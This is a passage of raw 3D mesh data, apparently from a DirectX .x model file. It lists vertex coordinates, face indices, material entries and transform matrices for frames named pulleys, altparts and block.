4;194,163,164,195;, 4;195,164,165,168;, 4;168,165,166,169;, 4;169,166,167,170;, 4;170,167,140,171;, 4;171,140,141,172;, 4;172,141,142,173;, 4;173,142,143,174;, 4;174,143,144,175;, 4;175,144,145,176;, 4;176,145,146,177;, 4;177,146,147,178;, 4;178,147,148,179;, 4;179,148,149,180;, 4;180,149,150,181;, 4;181,150,151,182;, 4;182,151,152,183;, 4;183,152,153,184;, 4;184,153,154,185;, 4;185,154,155,186;, 4;155,124,125,156;, 4;156,125,126,157;, 4;157,126,127,158;, 4;158,127,128,159;, 4;159,128,129,160;, 4;160,129,130,161;, 4;161,130,131,162;, 4;162,131,132,163;, 4;163,132,133,164;, 4;164,133,134,165;, 4;165,134,135,166;, 4;166,135,136,167;, 4;167,136,137,140;, 4;140,137,138,141;, 4;141,138,139,142;, 4;142,139,112,143;, 4;143,112,113,144;, 4;144,113,114,145;, 4;145,114,115,146;, 4;146,115,116,147;, 4;147,116,117,148;, 4;148,117,118,149;, 4;149,118,119,150;, 4;150,119,120,151;, 4;151,120,121,152;, 4;152,121,122,153;, 4;153,122,123,154;, 4;154,123,124,155;, 4;124,93,94,125;, 4;125,94,95,126;, 4;126,95,96,127;, 4;127,96,97,128;, 4;128,97,98,129;, 4;129,98,99,130;, 4;130,99,100,131;, 4;131,100,101,132;, 4;132,101,102,133;, 4;133,102,103,134;, 4;134,103,104,135;, 4;135,104,105,136;, 4;136,105,106,137;, 4;137,106,107,138;, 4;138,107,108,139;, 4;139,108,109,112;, 4;112,109,110,113;, 4;113,110,111,114;, 4;114,111,84,115;, 4;115,84,85,116;, 4;116,85,86,117;, 4;117,86,87,118;, 4;118,87,88,119;, 4;119,88,89,120;, 4;120,89,90,121;, 4;121,90,91,122;, 4;122,91,92,123;, 4;123,92,93,124;, 4;93,62,63,94;, 4;94,63,64,95;, 4;95,64,65,96;, 4;96,65,66,97;, 4;97,66,67,98;, 4;98,67,68,99;, 4;99,68,69,100;, 4;100,69,70,101;, 4;101,70,71,102;, 4;102,71,72,103;, 4;103,72,73,104;, 4;104,73,74,105;, 4;105,74,75,106;, 4;106,75,76,107;, 4;107,76,77,108;, 4;108,77,78,109;, 4;109,78,79,110;, 4;110,79,80,111;, 4;111,80,81,84;, 4;84,81,82,85;, 4;85,82,83,86;, 4;86,83,56,87;, 4;87,56,57,88;, 4;88,57,58,89;, 4;89,58,59,90;, 4;90,59,60,91;, 4;91,60,61,92;, 4;92,61,62,93;, 4;31,0,1,32;, 4;32,1,2,33;, 4;33,2,3,34;, 4;34,3,4,35;, 4;35,4,5,36;, 4;36,5,6,37;, 4;37,6,7,38;, 4;38,7,8,39;, 4;39,8,9,40;, 4;40,9,10,41;, 4;41,10,11,42;, 4;42,11,12,43;, 4;43,12,13,44;, 4;44,13,14,45;, 4;45,14,15,46;, 4;46,15,16,47;, 4;47,16,17,48;, 4;48,17,18,49;, 4;49,18,19,50;, 4;50,19,20,51;, 4;51,20,21,52;, 4;52,21,22,53;, 4;53,22,23,54;, 4;54,23,24,55;, 4;55,24,25,28;, 4;28,25,26,29;, 4;29,26,27,30;, 4;30,27,0,31;, 4;62,31,32,63;, 4;63,32,33,64;, 4;64,33,34,65;, 4;65,34,35,66;, 4;66,35,36,67;, 4;67,36,37,68;, 4;68,37,38,69;, 4;69,38,39,70;, 4;70,39,40,71;, 4;71,40,41,72;, 4;72,41,42,73;, 4;73,42,43,74;, 4;74,43,44,75;, 4;75,44,45,76;, 4;76,45,46,77;, 4;77,46,47,78;, 4;78,47,48,79;, 4;79,48,49,80;, 4;80,49,50,81;, 4;81,50,51,82;, 4;82,51,52,83;, 4;83,52,53,56;, 4;56,53,54,57;, 4;57,54,55,58;, 4;58,55,28,59;, 4;59,28,29,60;, 4;60,29,30,61;, 4;61,30,31,62;, 4;297,294,295,298;, 4;296,293,294,297;, 4;313,292,293,296;, 4;312,291,292,313;, 4;311,290,291,312;, 4;310,289,290,311;, 4;309,288,289,310;, 4;308,287,288,309;, 4;307,286,287,308;, 4;306,285,286,307;, 4;305,284,285,306;, 4;304,283,284,305;, 4;303,282,283,304;, 4;302,281,282,303;, 4;301,280,281,302;, 4;300,279,280,301;, 4;299,278,279,300;, 4;298,295,278,299;, 4;294,273,274,295;, 4;293,272,273,294;, 4;292,271,272,293;, 4;291,270,271,292;, 4;290,269,270,291;, 4;289,268,269,290;, 4;288,267,268,289;, 4;287,266,267,288;, 4;286,265,266,287;, 4;285,264,265,286;, 4;284,263,264,285;, 4;283,262,263,284;, 4;282,261,262,283;, 4;281,260,261,282;, 4;280,277,260,281;, 4;279,276,277,280;, 4;278,275,276,279;, 4;295,274,275,278;, 4;318,297,298,319;, 4;317,296,297,318;, 4;316,313,296,317;, 4;315,312,313,316;, 4;314,311,312,315;, 4;331,310,311,314;, 4;330,309,310,331;, 4;329,308,309,330;, 4;328,307,308,329;, 4;327,306,307,328;, 4;326,305,306,327;, 4;325,304,305,326;, 4;324,303,304,325;, 4;323,302,303,324;, 4;322,301,302,323;, 4;321,300,301,322;, 4;320,299,300,321;, 4;319,298,299,320;, 4;273,252,253,274;, 4;272,251,252,273;, 4;271,250,251,272;, 4;270,249,250,271;, 4;269,248,249,270;, 4;268,247,248,269;, 4;267,246,247,268;, 4;266,245,246,267;, 4;265,244,245,266;, 4;264,243,244,265;, 4;263,242,243,264;, 4;262,259,242,263;, 4;261,258,259,262;, 4;260,257,258,261;, 4;277,256,257,260;, 4;276,255,256,277;, 4;275,254,255,276;, 4;274,253,254,275;, 4;252,233,232,253;, 4;251,234,233,252;, 4;250,235,234,251;, 4;249,236,235,250;, 4;248,237,236,249;, 4;247,238,237,248;, 4;246,239,238,247;, 4;245,240,239,246;, 4;244,241,240,245;, 4;243,224,241,244;, 4;242,225,224,243;, 4;259,226,225,242;, 4;258,227,226,259;, 4;257,228,227,258;, 4;256,229,228,257;, 4;255,230,229,256;, 4;254,231,230,255;, 4;253,232,231,254;, 4;339,318,319,340;, 4;338,317,318,339;, 4;337,316,317,338;, 4;336,315,316,337;, 4;335,314,315,336;, 4;334,331,314,335;, 4;333,330,331,334;, 4;332,329,330,333;, 4;349,328,329,332;, 4;348,327,328,349;, 4;347,326,327,348;, 4;346,325,326,347;, 4;345,324,325,346;, 4;344,323,324,345;, 4;343,322,323,344;, 4;342,321,322,343;, 4;341,320,321,342;, 4;340,319,320,341;; MeshMaterialList { 1; 307; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.784314;0.784314;0.784314;1.0;; 60.0; 0.784314;0.784314;0.784314;; 0.498039;0.498039;0.498039;; } # Material } # MeshMaterialList } # Mesh } # Frame _pulleys Frame _altparts { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh altparts { 78; -1.163969;-0.140828;-1.619202;, -1.163968;-0.143058;-1.607816;, -1.163968;-0.108402;-1.607816;, -1.119414;-0.132811;-1.619205;, -1.118667;-0.134907;-1.607819;, -1.130281;-0.102340;-1.607818;, -1.080234;-0.109729;-1.619207;, -1.078827;-0.111437;-1.607821;, -1.100658;-0.084888;-1.607820;, -1.051153;-0.074363;-1.619210;, -1.049258;-0.075477;-1.607822;, -1.078672;-0.058150;-1.607821;, -1.035679;-0.030983;-1.619211;, -1.033525;-0.031370;-1.607824;, -1.066973;-0.025351;-1.607822;, -1.035679;0.015182;-1.619211;, -1.033525;0.015570;-1.607824;, -1.066973;0.009552;-1.607822;, -1.051153;0.058564;-1.619210;, -1.049258;0.059678;-1.607822;, -1.078672;0.042351;-1.607821;, -1.080234;0.093928;-1.619207;, -1.078827;0.095636;-1.607821;, -1.100658;0.069089;-1.607820;, -1.119414;0.117011;-1.619205;, -1.118667;0.119106;-1.607819;, -1.130281;0.086541;-1.607818;, -1.163969;0.125027;-1.619202;, -1.163968;0.127257;-1.607816;, -1.163968;0.092601;-1.607816;, -1.208524;0.117011;-1.619200;, -1.209270;0.119106;-1.607814;, -1.197655;0.086541;-1.607814;, -1.247705;0.093928;-1.619197;, -1.249107;0.095636;-1.607810;, -1.227277;0.069089;-1.607811;, -1.276785;0.058564;-1.619196;, -1.278676;0.059678;-1.607809;, -1.249265;0.042351;-1.607810;, -1.292259;0.015182;-1.619194;, -1.041664;0.015570;-1.607813;, -1.260963;0.009552;-1.607809;, -1.292259;-0.030983;-1.619194;, -1.041664;-0.031370;-1.607813;, -1.260963;-0.025351;-1.607809;, -1.276785;-0.074363;-1.619196;, -1.278676;-0.075477;-1.607809;, -1.249265;-0.058150;-1.607810;, -1.247705;-0.109729;-1.619197;, -1.249107;-0.111437;-1.607810;, -1.227277;-0.084888;-1.607811;, -1.208524;-0.132811;-1.619200;, -1.209270;-0.134907;-1.607814;, -1.197655;-0.102340;-1.607814;, -1.178383;0.178129;-1.497040;, -1.178391;0.178129;-1.555371;, -1.212759;0.171945;-1.555368;, -1.212753;0.171945;-1.497038;, -1.239867;0.161874;-1.497036;, -1.239873;0.161874;-1.555367;, -1.270097;0.144070;-1.555365;, -1.270090;0.144070;-1.497034;, -1.292195;0.125144;-1.497033;, -1.292200;0.125144;-1.555363;, -1.314633;0.097864;-1.555362;, -1.314627;0.097864;-1.497032;, -1.329054;0.072365;-1.497030;, -1.329061;0.072365;-1.555361;, -1.340997;0.038902;-1.555361;, -1.340991;0.038902;-1.497030;, -1.346000;0.009905;-1.497029;, -1.346007;0.009905;-1.555360;, -1.346007;-0.025706;-1.555360;, -1.346000;-0.025706;-1.497029;, -1.340991;-0.054702;-1.497030;, -1.340997;-0.054702;-1.555361;, -1.329061;-0.088165;-1.555361;, -1.329054;-0.088165;-1.497030;; 46; 4;55,56,57,54;, 4;59,60,61,58;, 4;63,64,65,62;, 4;29,26,25,28;, 4;32,29,28,31;, 4;35,32,31,34;, 4;38,35,34,37;, 4;26,23,22,25;, 4;23,20,19,22;, 4;20,17,16,19;, 4;17,14,13,16;, 4;14,11,10,13;, 4;11,8,7,10;, 4;8,5,4,7;, 4;5,2,1,4;, 4;2,53,52,1;, 4;53,50,49,52;, 4;50,47,46,49;, 4;28,25,24,27;, 4;31,28,27,30;, 4;34,31,30,33;, 4;37,34,33,36;, 4;25,22,21,24;, 4;22,19,18,21;, 4;19,16,15,18;, 4;16,13,12,15;, 4;13,10,9,12;, 4;10,7,6,9;, 4;7,4,3,6;, 4;4,1,0,3;, 4;1,52,51,0;, 4;52,49,48,51;, 4;49,46,45,48;, 3;40,38,37;, 3;38,40,41;, 4;44,41,40,43;, 3;47,44,43;, 3;47,43,46;, 3;40,37,36;, 3;46,43,45;, 3;40,36,39;, 4;43,40,39,42;, 3;45,43,42;, 4;67,68,69,66;, 4;71,72,73,70;, 4;75,76,77,74;; MeshMaterialList { 1; 46; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.784314;0.784314;0.784314;1.0;; 60.0; 0.784314;0.784314;0.784314;; 0.498039;0.498039;0.498039;; } # Material } # MeshMaterialList } # Mesh } # Frame _altparts Frame _block { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh block { 656; -0.494101;0.365313;-0.659319;, -0.494103;0.365313;-0.782082;, -0.494116;0.365313;-1.268482;, -0.494117;0.365313;-1.282395;, -0.494117;0.365313;-1.308131;, -0.494071;0.365313;0.475891;, -0.494072;0.365313;0.450157;, -0.494072;0.365313;0.436243;, -0.494084;0.365313;-0.050157;, -0.494087;0.365313;-0.172919;, -0.494115;0.402294;-1.217952;, -0.494105;0.402294;-0.832610;, -0.494100;0.402294;-0.608791;, -0.494090;0.402294;-0.223448;, -0.494073;0.402294;0.385715;, -0.494083;0.402294;0.000372;, -0.848049;-0.610748;0.475901;, -0.848051;-0.610748;0.450166;, -0.848052;-0.610748;0.420115;, -0.848065;-0.610748;-0.145110;, -0.848080;-0.610748;-0.710335;, -0.848096;-0.610748;-1.282386;, -0.848096;-0.610748;-1.308122;, -0.823767;-0.610748;-1.308122;, -0.823767;-0.610748;-1.282387;, -0.823763;-0.610748;-1.138007;, -0.823761;-0.610748;-0.993628;, -0.823747;-0.610748;-0.521928;, -0.823742;-0.610748;-0.333519;, -0.823732;-0.610748;0.043299;, -0.823726;-0.610748;0.231705;, -0.823730;-0.610748;0.161406;, -0.823724;-0.610748;0.305786;, -0.823722;-0.610748;0.450166;, -0.823720;-0.610748;0.475900;, -0.743679;0.366582;0.000379;, -0.743672;0.366582;0.193050;, -0.743668;0.366582;0.385721;, -0.743694;0.366582;-0.608784;, -0.743689;0.366582;-0.416113;, -0.743683;0.366582;-0.223441;, -0.743711;0.366582;-1.217946;, -0.743704;0.366582;-1.025275;, -0.743700;0.366582;-0.832603;, -0.859221;-0.532574;0.305518;, -0.859004;-0.558553;0.321419;, -0.855054;-0.542002;0.293411;, -0.855062;-0.542002;-0.018406;, -0.859015;-0.558553;-0.046413;, -0.859231;-0.532574;-0.030513;, -0.887189;-0.469352;-0.030512;, -0.906261;-0.451710;-0.046412;, -0.891358;-0.459924;-0.018405;, -0.906252;-0.451710;0.321420;, -0.887180;-0.469352;0.305518;, -0.891350;-0.459924;0.293412;, -0.987340;-0.331163;0.305521;, -0.974051;-0.361999;0.328499;, -0.980551;-0.338921;0.293414;, -0.980558;-0.338921;-0.018402;, -0.974061;-0.361999;-0.053489;, -0.987350;-0.331163;-0.030510;, -1.185786;-0.104450;-0.030504;, -1.214592;-0.087194;-0.053482;, -1.192575;-0.096692;-0.018397;, -1.214581;-0.087194;0.328506;, -1.185777;-0.104450;0.305526;, -1.192567;-0.096692;0.293420;, -0.987355;-0.331163;-0.259704;, -0.974065;-0.361999;-0.236726;, -0.980566;-0.338921;-0.271811;, -0.980575;-0.338921;-0.583628;, -0.974075;-0.361999;-0.618713;, -0.987364;-0.331163;-0.595736;, -1.185801;-0.104450;-0.595731;, -1.214605;-0.087194;-0.618707;, -1.192591;-0.096692;-0.583622;, -1.214596;-0.087194;-0.236720;, -1.185792;-0.104450;-0.259699;, -1.192582;-0.096692;-0.271805;, -0.859236;-0.532574;-0.259707;, -0.859020;-0.558553;-0.243806;, -0.855069;-0.542002;-0.271814;, -0.855077;-0.542002;-0.583631;, -0.859029;-0.558553;-0.611638;, -0.859245;-0.532574;-0.595740;, -0.887204;-0.469352;-0.595739;, -0.906276;-0.451710;-0.611637;, -0.891375;-0.459924;-0.583630;, -0.906266;-0.451710;-0.243805;, -0.887196;-0.469352;-0.259706;, -0.891366;-0.459924;-0.271813;, -1.192597;-0.096692;-0.837031;, -1.214610;-0.087194;-0.801944;, -1.185807;-0.104450;-0.824925;, -0.987370;-0.331163;-0.824930;, -0.974081;-0.361999;-0.801950;, -0.980580;-0.338921;-0.837036;, -0.980589;-0.338921;-1.148853;, -0.974092;-0.361999;-1.183939;, -0.987380;-0.331163;-1.160959;, -1.214621;-0.087194;-1.183933;, -1.192605;-0.096692;-1.148847;, -1.185816;-0.104450;-1.160954;, -0.887218;-0.469352;-1.160962;, -0.906291;-0.451710;-1.176863;, -0.891388;-0.459924;-1.148855;, -0.891379;-0.459924;-0.837038;, -0.906282;-0.451710;-0.809031;, -0.887209;-0.469352;-0.824933;, -0.859251;-0.532574;-0.824934;, -0.859035;-0.558553;-0.809032;, -0.855084;-0.542002;-0.837039;, -0.859045;-0.558553;-1.176864;, -0.859261;-0.532574;-1.160963;, -0.855093;-0.542002;-1.148856;, -0.845654;-0.537832;-0.837040;, -0.848025;-0.506977;-0.859202;, -0.849822;-0.528404;-0.824934;, -0.877779;-0.465180;-0.824933;, -0.860722;-0.478268;-0.859201;, -0.881949;-0.455754;-0.837039;, -0.845659;-0.537832;-1.148856;, -0.849830;-0.528404;-1.160963;, -0.848033;-0.506977;-1.126695;, -0.881958;-0.455754;-1.148855;, -0.860728;-0.478268;-1.126694;, -0.877789;-0.465180;-1.160962;, -0.979620;-0.324372;-1.160959;, -0.984289;-0.303384;-1.126691;, -0.972830;-0.332129;-1.148853;, -0.972822;-0.332129;-0.837036;, -0.984282;-0.303384;-0.859198;, -0.979611;-0.324372;-0.824931;, -1.178056;-0.097658;-1.160954;, -1.184845;-0.089901;-1.148848;, -1.157871;-0.105068;-1.126686;, -1.178048;-0.097658;-0.824925;, -1.157864;-0.105068;-0.859194;, -1.184837;-0.089901;-0.837031;, -0.881942;-0.455754;-0.583631;, -0.860714;-0.478268;-0.561469;, -0.877772;-0.465180;-0.595739;, -0.849815;-0.528404;-0.595740;, -0.848018;-0.506977;-0.561470;, -0.845645;-0.537832;-0.583632;, -0.881934;-0.455754;-0.271813;, -0.877763;-0.465180;-0.259707;, -0.860706;-0.478268;-0.293976;, -0.845637;-0.537832;-0.271814;, -0.848011;-0.506977;-0.293976;, -0.849805;-0.528404;-0.259707;, -1.184831;-0.089901;-0.583623;, -1.157857;-0.105068;-0.561462;, -1.178041;-0.097658;-0.595731;, -0.979605;-0.324372;-0.595736;, -0.984275;-0.303384;-0.561466;, -0.972816;-0.332129;-0.583628;, -1.184823;-0.089901;-0.271805;, -1.178032;-0.097658;-0.259699;, -1.157850;-0.105068;-0.293968;, -0.972807;-0.332129;-0.271811;, -0.984267;-0.303384;-0.293972;, -0.979597;-0.324372;-0.259704;, -1.184815;-0.089901;-0.018397;, -1.157841;-0.105068;0.003764;, -1.178027;-0.097658;-0.030505;, -0.979591;-0.324372;-0.030510;, -0.984261;-0.303384;0.003760;, -0.972800;-0.332129;-0.018402;, -1.184807;-0.089901;0.293420;, -1.178018;-0.097658;0.305526;, -1.157834;-0.105068;0.271257;, -0.972792;-0.332129;0.293414;, -0.984252;-0.303384;0.271253;, -0.979581;-0.324372;0.305521;, -0.881927;-0.455754;-0.018405;, -0.860698;-0.478268;0.003756;, -0.877759;-0.465180;-0.030513;, -0.849801;-0.528404;-0.030513;, -0.848003;-0.506977;0.003756;, -0.845630;-0.537832;-0.018406;, -0.881919;-0.455754;0.293412;, -0.877750;-0.465180;0.305518;, -0.860692;-0.478268;0.271249;, -0.845623;-0.537832;0.293411;, -0.847996;-0.506977;0.271249;, -0.849792;-0.528404;0.305517;, -0.848052;-0.583321;0.420115;, -0.848065;-0.583321;-0.145110;, -0.848080;-0.583321;-0.710335;, -0.917233;-0.426945;-0.710333;, -0.917218;-0.426945;-0.145109;, -0.917203;-0.426945;0.420117;, -1.271453;-0.022248;-0.710324;, -1.271438;-0.022248;-0.145099;, -1.271423;-0.022248;0.420127;, -0.935177;0.277026;-0.052401;, -0.935180;0.277026;-0.170652;, -0.823732;-0.583321;0.043299;, -0.823726;-0.583321;0.231705;, -0.766305;0.320235;-0.172912;, -0.766303;0.320235;-0.050150;, -0.921052;0.280641;-0.397641;, -0.921047;0.280641;-0.189310;, -0.780439;0.316618;-0.191191;, -0.780447;0.316618;-0.397645;, -0.780430;0.316618;0.174583;, -0.780437;0.316618;-0.031872;, -0.921043;0.280641;-0.033743;, -0.921037;0.280641;0.174587;, -0.780437;0.316618;-0.068807;, -0.780439;0.316618;-0.154256;, -0.921045;0.280641;-0.152375;, -0.921044;0.280641;-0.070680;, -0.888899;0.267785;-0.229624;, -0.802464;0.289901;-0.230779;, -0.802467;0.289901;-0.357691;, -0.888902;0.267785;-0.357689;, -0.802458;0.289901;0.007720;, -0.888894;0.267785;0.006568;, -0.888890;0.267785;0.134634;, -0.802455;0.289901;0.134632;, -0.802464;0.289901;-0.137794;, -0.888897;0.267785;-0.136637;, -0.888896;0.267785;-0.086418;, -0.802460;0.289901;-0.085267;, -0.802453;0.289901;0.251470;, -0.888887;0.267785;0.251472;, -0.888885;0.267785;0.379537;, -0.802448;0.289901;0.378381;, -0.921036;0.280641;0.211522;, -0.921031;0.280641;0.419853;, -0.780423;0.316618;0.417972;, -0.780429;0.316618;0.211518;, -0.766289;0.320235;0.436250;, -0.848051;-0.583321;0.450166;, -0.823730;-0.583321;0.161406;, -0.823724;-0.583321;0.305786;, -0.823722;-0.583321;0.450166;, -0.917202;-0.426945;0.450168;, -0.935165;0.277026;0.438509;, -0.766296;0.320235;0.193051;, -0.766289;0.320235;0.450164;, -0.935164;0.277026;0.450168;, -1.271422;-0.022248;0.450177;, -0.766288;0.320235;0.475899;, -0.935163;0.277026;0.475903;, -1.271422;-0.022248;0.475912;, -0.917202;-0.426945;0.475903;, -0.848049;-0.583321;0.475901;, -0.848096;-0.583321;-1.308122;, -0.917248;-0.426945;-1.308120;, -1.271468;-0.022248;-1.308110;, -0.935210;0.277026;-1.308119;, -0.766335;0.320235;-1.308124;, -1.271468;-0.022248;-1.282375;, -0.935210;0.277026;-1.282384;, -0.766335;0.320235;-1.282388;, -0.766327;0.320235;-1.025274;, -0.935210;0.277026;-1.270725;, -0.917248;-0.426945;-1.282384;, -0.823767;-0.583321;-1.282387;, -0.823763;-0.583321;-1.138007;, -0.823761;-0.583321;-0.993628;, -0.848096;-0.583321;-1.282386;, -0.766335;0.320235;-1.268475;, -0.780463;0.316618;-1.043740;, -0.780468;0.316618;-1.250195;, -0.921075;0.280641;-1.252068;, -0.921070;0.280641;-1.043736;, -0.802490;0.289901;-1.210604;, -0.888926;0.267785;-1.211756;, -0.888921;0.267785;-1.083690;, -0.802487;0.289901;-1.083693;, -0.802477;0.289901;-0.746958;, -0.888913;0.267785;-0.745800;, -0.888912;0.267785;-0.695580;, -0.802477;0.289901;-0.694427;, -0.802485;0.289901;-0.966854;, -0.888918;0.267785;-0.966852;, -0.888916;0.267785;-0.838785;, -0.802481;0.289901;-0.839942;, -0.888906;0.267785;-0.474527;, -0.802471;0.289901;-0.474530;, -0.802474;0.289901;-0.601443;, -0.888909;0.267785;-0.602594;, -0.921062;0.280641;-0.761537;, -0.921061;0.280641;-0.679842;, -0.780452;0.316618;-0.677967;, -0.780456;0.316618;-0.763419;, -0.921068;0.280641;-1.006803;, -0.921063;0.280641;-0.798472;, -0.780457;0.316618;-0.800353;, -0.780461;0.316618;-1.006807;, -0.780447;0.316618;-0.434579;, -0.780451;0.316618;-0.641032;, -0.921060;0.280641;-0.642908;, -0.921053;0.280641;-0.434575;, -0.766321;0.320235;-0.782075;, -0.766317;0.320235;-0.659311;, -0.823747;-0.583321;-0.521928;, -0.823742;-0.583321;-0.333519;, -0.935194;0.277026;-0.661563;, -0.935196;0.277026;-0.779814;, -0.935187;0.277026;-0.416108;, -0.766313;0.320235;-0.416112;, -0.848096;-0.583321;-1.304767;, -0.844448;-0.582550;-1.308122;, -0.914138;-0.424960;-1.308120;, -0.917248;-0.426945;-1.304799;, -0.848096;-0.610748;-1.303479;, -0.844448;-0.607101;-1.308122;, -0.823767;-0.610748;-1.304840;, -0.823767;-0.607101;-1.308122;, -0.494117;0.365313;-1.304804;, -0.766335;0.320235;-1.304837;, -0.765584;0.316662;-1.308124;, -0.935210;0.277026;-1.304741;, -0.933447;0.273712;-1.308119;, -1.271468;-0.022248;-1.303488;, -1.266341;-0.022568;-1.308110;, -0.823720;-0.610748;0.472618;, -0.823720;-0.607101;0.475900;, -0.848051;-0.610748;0.471260;, -0.844400;-0.607101;0.475901;, -0.848051;-0.583321;0.472546;, -0.844400;-0.582550;0.475901;, -0.917202;-0.426945;0.472582;, -0.914092;-0.424960;0.475902;, -1.271422;-0.022248;0.471289;, -1.266294;-0.022568;0.475912;, -0.935164;0.277026;0.472525;, -0.933402;0.273712;0.475903;, -0.766288;0.320235;0.472613;, -0.765537;0.316662;0.475899;, -0.494071;0.365313;0.472565;, -0.222605;0.316662;0.475884;, -0.221854;0.320235;0.472599;, -0.054741;0.273712;0.475880;, -0.052979;0.277026;0.472502;, 0.278152;-0.022568;0.475871;, 0.283279;-0.022248;0.471248;, -0.074051;-0.424960;0.475880;, -0.070941;-0.426945;0.472560;, -0.143742;-0.582550;0.475882;, -0.140093;-0.583321;0.472527;, -0.143742;-0.607101;0.475882;, -0.140093;-0.610748;0.471241;, -0.164422;-0.607101;0.475883;, -0.164422;-0.610748;0.472600;, 0.278105;-0.022568;-1.308151;, 0.283232;-0.022248;-1.303529;, -0.054789;0.273712;-1.308142;, -0.053025;0.277026;-1.304764;, -0.222653;0.316662;-1.308138;, -0.221900;0.320235;-1.304851;, -0.164468;-0.607101;-1.308140;, -0.164468;-0.610748;-1.304857;, -0.143788;-0.607101;-1.308140;, -0.140140;-0.610748;-1.303498;, -0.070986;-0.426945;-1.304822;, -0.074099;-0.424960;-1.308142;, -0.143789;-0.582550;-1.308140;, -0.140140;-0.583321;-1.304786;, -0.221878;0.320235;-0.416127;, -0.053001;0.277026;-0.416131;, -0.053012;0.277026;-0.779837;, -0.053009;0.277026;-0.661586;, -0.164443;-0.583321;-0.333536;, -0.164447;-0.583321;-0.521945;, -0.221884;0.320235;-0.659326;, -0.221888;0.320235;-0.782089;, -0.067136;0.280641;-0.434598;, -0.067142;0.280641;-0.642931;, -0.207748;0.316618;-0.641047;, -0.207743;0.316618;-0.434594;, -0.207758;0.316618;-1.006822;, -0.207752;0.316618;-0.800368;, -0.067145;0.280641;-0.798495;, -0.067152;0.280641;-1.006826;, -0.207752;0.316618;-0.763434;, -0.207750;0.316618;-0.677982;, -0.067143;0.280641;-0.679864;, -0.067144;0.280641;-0.761560;, -0.099288;0.267785;-0.602615;, -0.185725;0.289901;-0.601459;, -0.185721;0.289901;-0.474546;, -0.099286;0.267785;-0.474548;, -0.185730;0.289901;-0.839958;, -0.099296;0.267785;-0.838806;, -0.099299;0.267785;-0.966873;, -0.185734;0.289901;-0.966871;, -0.185728;0.289901;-0.694443;, -0.099292;0.267785;-0.695601;, -0.099293;0.267785;-0.745821;, -0.185730;0.289901;-0.746974;, -0.185738;0.289901;-1.083709;, -0.099302;0.267785;-1.083711;, -0.099305;0.267785;-1.211777;, -0.185740;0.289901;-1.210620;, -0.067153;0.280641;-1.043759;, -0.067158;0.280641;-1.252091;, -0.207764;0.316618;-1.250210;, -0.207760;0.316618;-1.043755;, -0.221900;0.320235;-1.268489;, -0.140140;-0.583321;-1.282405;, -0.164460;-0.583321;-0.993646;, -0.164464;-0.583321;-1.138024;, -0.164468;-0.583321;-1.282404;, -0.070986;-0.426945;-1.282407;, -0.053024;0.277026;-1.270748;, -0.221893;0.320235;-1.025289;, -0.221900;0.320235;-1.282403;, -0.053025;0.277026;-1.282407;, 0.283234;-0.022248;-1.282416;, -0.221900;0.320235;-1.308138;, -0.053025;0.277026;-1.308142;, 0.283232;-0.022248;-1.308151;, -0.070986;-0.426945;-1.308142;, -0.140140;-0.583321;-1.308140;, -0.140092;-0.583321;0.475882;, -0.070940;-0.426945;0.475880;, 0.283279;-0.022248;0.475871;, -0.052979;0.277026;0.475880;, -0.221854;0.320235;0.475884;, 0.283279;-0.022248;0.450136;, -0.052980;0.277026;0.450145;, -0.221855;0.320235;0.450150;, -0.221861;0.320235;0.193037;, -0.052980;0.277026;0.438485;, -0.070942;-0.426945;0.450146;, 